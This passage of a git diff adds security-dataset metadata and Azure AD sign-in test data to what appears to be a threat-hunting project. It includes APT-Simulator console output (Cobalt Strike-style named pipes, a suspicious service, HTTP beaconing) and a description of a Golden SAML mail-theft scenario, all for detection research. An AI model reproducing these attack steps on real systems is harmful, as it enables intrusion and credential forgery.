Pipe number 2 (P2P communication): msagent_fedac123\n\nWaiting for 0 seconds, press a key to continue ...\nKilling named pipe creator for pipe 2\nSUCCESS: The process \"CreateNamedPipe.exe\" with PID 4236 has been terminated.\nCreating Named Pipe number 3 (Post Exploitation): postex_ssh_fedac123\n\nWaiting for 0 seconds, press a key to continue ...\nKilling named pipe creator for pipe 3\nSUCCESS: The process \"CreateNamedPipe.exe\" with PID 7444 has been terminated.\nCreating Named Pipe number 3 (Post Exploitation): postex_ssh_fedac123\n\nWaiting for 0 seconds, press a key to continue ...\nKilling named pipe creator for pipe 3\nSUCCESS: The process \"CreateNamedPipe.exe\" with PID 512 has been terminated.\n\n--- Simulating GetSystem ...\n\nWaiting for 0 seconds, press a key to continue ...\nCopy a service binary file to a suspicious location ...\nUsing Post-CobaltStrike 4.2 scheme\n        1 file(s) copied.\nStarting suspicious service\n[SC] CreateService SUCCESS\n[SC] StartService FAILED 1053:\n\nThe service did not respond to the start or control request in a timely fashion.\n\n[SC] ControlService FAILED 1062:\n\nThe service has not been started.\n\n[SC] DeleteService SUCCESS\n\nWaiting for 0 seconds, press a key to continue ...\nKilling named pipe creator\nERROR: The process \"CreateNamedPipe.exe\" not found.\n\n--- HTTP Beaconing 1\nSimulating HTTP beaconing - this step takes up to an hour to complete\n\nBeacon 1 - HTTP 30s+50//10.0.2.15/pixel.gif\nSending HTTP request ...\n\nC:\\Users\\APT-Simulator\\Documents\\APTSimulator-master>"
+        },
+        "references": [
+            "https://twitter.com/cyb3rops/status/1403253268051107840"
+        ],
+        "mp_last_updated": "2022-01-08T01:50:06.407503+00:00"
+    },
+    "datasets/compound/_metadata/GoldenSAMLADFSMailAccess.yaml": {
+        "title": "Golden SAML AD FS Mail Access",
+        "id": "377d9af5-5009-48d9-ae97-1756a01d7ef8",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2021/08/02",
+        "modification_date": "2021/08/02",
+        "platform": [
+            "Windows",
+            "Azure"
+        ],
+        "type": "compound",
+        "tags": [
+            "SimuLand"
+        ],
+        "description": "This dataset represent a threat actor stealing the AD FS token signing certificate from an on-prem AD FS server to sign a new SAML token, impersonate a privileged user and eventually collect mail data via the Microsoft Graph API.",
+        "attack_mappings": [
+            {
+                "technique": "T1552",
+                "sub-technique": "004",
+                "tactics": [
+                    "TA0006"
+                ]
+            },
+            {
+                "technique": "T1606",
+                "sub-technique": "002",
+                "tactics": [
+                    "TA0006"
+                ]
+            },
+            {
+                "technique": "T1606",
+                "sub-technique": "002",
+                "tactics": [
+                    "TA0006"
+                ]
+            },
+            {
+                "technique": "T1078",
+                "sub-technique": "004",
+                "tactics": [
+                    "TA0001",
+                    "TA0003",
+                    "TA0004",
+                    "TA0005"
+                ]
+            },
+            {
+                "technique": "T1098",
+                "sub-technique": "002",
+                "tactics": [
+                    "TA0003"
+                ]
+            },
+            {
+                "technique": "T1114",
+                "sub-technique": null,
+                "tactics": [
+                    "TA0009"
+                ]
+            }
+        ],
+        "files": [
+            {
+                "type": "Cloud",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/compound/GoldenSAMLADFSMailAccess/AADAuditEvents.Zip"
+            },
+            {
+                "type": "Cloud",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/compound/GoldenSAMLADFSMailAccess/Microsoft365DefenderEvents.Zip"
+            },
+            {
+                "type": "Cloud",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/compound/GoldenSAMLADFSMailAccess/OfficeActivityEvents.Zip"
+            },
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/compound/GoldenSAMLADFSMailAccess/WindowsEvents.Zip"
+            }
+        ],
+        "simulation": {
+            "environment": "SimuLand",
+            "environment_link": "https://github.com/Azure/SimuLand/tree/main/2_deploy/aadHybridIdentityADFS"
+        },
+        "references": [
+            "https://github.com/Azure/SimuLand",
+            "https://github.com/Azure/SimuLand/tree/main/labs/01_GoldenSAMLADFSMailAccess"
+        ],
+        "mp_last_updated": "2022-01-08T01:50:06.595675+00:00"
+    }
+}
\ No newline at end of file
diff --git a/tests/testdata/morph_test.csv b/tests/testdata/morph_test.csv
new file mode 100644
index 000000000..604c10fe2
--- /dev/null
+++ b/tests/testdata/morph_test.csv
@@ -0,0 +1,2174 @@
+,TenantId,SourceSystem,TimeGenerated,ResourceId,OperationName,OperationVersion,Category,ResultType,ResultSignature,ResultDescription,DurationMs,CorrelationId,Resource,ResourceGroup,ResourceProvider,Identity,Level,Location,AppDisplayName,AppId,ClientAppUsed,ConditionalAccessPolicies,ConditionalAccessStatus,CreatedDateTime,DeviceDetail,Id,IPAddress,IsRisky,LocationDetails,RiskDetail,RiskLevelAggregated,RiskState,RiskLevelDuringSignIn,RiskEventTypes,Status,UserDisplayName,UserId,UserPrincipalName,AADTenantId,ResourceDisplayName,OriginalRequestId,Type,Result,Latitude,Longitude
+0,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,44:42.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d1395072-8972-42fb-9171-d62afcde1a82,Microsoft.aadiam,Microsoft.aadiam,,Ely Abramovitch,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 14:44,"{'operatingSystem': 'Windows 10', 'deviceId': 'c44a422d-5560-4c92-92f8-d48eac67534b', 'browser': 'Chrome 80.0.3987', 'displayName': 'ELABRAMO-LAP', 'isCompliant': True, 'trustType': 'Hybrid Azure AD joined', 'isManaged': True}",a5fe142e-7b69-4bc0-acbb-f244e2025a00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.2205696105957, 'latitude': 32.77729034423828}, 'state': 'Hazafon', 'city': 'Bir Al-Maksur'}",none,none,none,none,[],{'errorCode': 0},Ely Abramovitch,43177305-d1dc-4a24-b3a7-81bac53bed4a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,a5fe142e-7b69-4bc0-acbb-f244e2025a00,SigninLogs,Sucess,32.77729034,35.22056961
+1,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,39:21.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b9c440cc-ca58-446c-a39b-ca5d1c6fc16f,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 17:39,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",aa57d52a-288e-488c-a4a9-011b94351b00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,aa57d52a-288e-488c-a4a9-011b94351b00,SigninLogs,Sucess,33.7984581,-84.38828278
+2,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,07:50.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d424479f-d00f-0000-5683-4399cb9c0d17,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 18:07,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",cfab9824-c87d-41e8-8623-1f6daabf1c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,cfab9824-c87d-41e8-8623-1f6daabf1c00,SigninLogs,Sucess,33.7984581,-84.38828278
+3,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,13:16.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,49aa38bd-08fe-402e-a0f0-3ad25a1c4dd9,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Cloud App Security,05a65629-4c1b-48c1-a78b-804c4abdd4af,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 18:13,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",5b07faad-beec-46e1-ae61-d56d7a1c1f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,5b07faad-beec-46e1-ae61-d56d7a1c1f00,SigninLogs,Sucess,33.7984581,-84.38828278
+4,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:12.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,6b60009d-1a15-4140-83fe-b72956b00dba,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:34,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",65ce963c-c870-4311-8389-19e514610600,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,65ce963c-c870-4311-8389-19e514610600,SigninLogs,Sucess,50.6406517,5.572050095
+5,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,35:35.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5910a703-4678-431e-8af0-af9d0ddfc088,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:35,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",ec85dd07-c5e8-494c-aa5b-3f845ecf0600,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,ec85dd07-c5e8-494c-aa5b-3f845ecf0600,SigninLogs,Sucess,50.6406517,5.572050095
+6,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:03.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f8118166-e7c3-4c0b-96f7-b081fa3ad4cf,Microsoft.aadiam,Microsoft.aadiam,,Itay Argoety,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 